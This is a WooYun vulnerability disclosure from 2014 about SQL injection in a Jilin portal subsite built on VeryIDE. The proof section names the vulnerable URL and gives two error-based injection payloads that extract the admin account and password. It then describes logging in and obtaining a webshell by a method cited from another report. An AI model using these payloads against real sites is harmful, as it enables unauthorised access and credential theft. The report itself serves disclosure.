当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081252

漏洞标题:吉和网分站sql注入漏洞getshell

相关厂商:吉和网

漏洞作者: Mr Grey

提交时间:2014-10-30 10:39

修复时间:2014-12-14 10:40

公开时间:2014-12-14 10:40

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

吉和网分站sql漏洞 getshell

详细说明:

http://zt.365jilin.com veryIDE
sql:http://zt.365jilin.com/module/form/content/?id=190

1.jpg


2.jpg


漏洞证明:

乌云有payload
具体语句自己构造
查询账号

3.jpg


qqq',(select (1) from information_schema.tables where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select account from system_admin where id=1),1,62)))a from information_schema.tables group by a)b)),0,1370615079,1)#


查询密码

4.jpg


qqq',(select (1) from information_schema.tables where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select password from system_admin where id=1),1,62)))a from information_schema.tables group by a)b)),0,1370615079,1)#


登录后台

5.jpg


getshell 方法参照此 WooYun: VeryIDE互动营销平台一系列问题,N多门户、地方网站中招

修复方案:

升级veryIDE到最新版本 or 你们自己修复

版权声明:转载请注明来源 Mr Grey@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝